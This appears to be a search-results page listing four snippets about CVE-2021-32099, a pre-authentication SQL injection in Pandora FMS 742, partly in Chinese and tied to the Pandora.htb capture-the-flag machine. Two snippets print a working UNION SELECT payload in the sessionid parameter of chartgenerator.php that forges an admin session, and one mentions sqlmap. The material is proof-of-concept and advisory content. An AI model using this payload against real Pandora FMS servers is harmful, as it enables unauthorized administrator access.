4 matches found
CVE-2021-32099_SQLi
CVE-2021-32099 SQLi 绕过登录 在尝试读取 Pandora.htb 上的 User Flag 时非常有用 CVE-2021-32099 SQLi 允许攻击者绕过登录。 目标 利用目标:Pandora FMS v7.0NG.742FIXPERL2020 分析 从 cvedetail 中读取。我们知道目标端点:http://localhost:8000/pandoraconsole/include/chartgenerator.php?sessionid=PayloadHere = 访问被拒绝。 sqlmap -r req.txt -p sessionid...
CVE-2021-32099
CVE-2021-32099 CVE-2021-32099 POC : http://localhost:8000/pandoraconsole/include/chartgenerator.php?sessionid=a%27%20UNION%20SELECT%20%27a%27,1,%27idusuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessionsphp%20WHERE%20%271%27=%271 详情 :...
CVE-2021-32099
CVE-2021-32099 pandora fms 742 sqli pre authentication POC root@kitploit: http://localhost/pandoraconsole/include/chartgenerator.php?sessionid=a' UNION SELECT 'a',1,'idusuario|s:5:"admin";' as data FROM tsessionsphp WHERE '1'='1 URL Encoded root@kitploit:...
CVE-2021-32099
A SQL injection vulnerability in the pandoraconsole component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chartgenerator.php sessionid parameter, leading to a login bypass...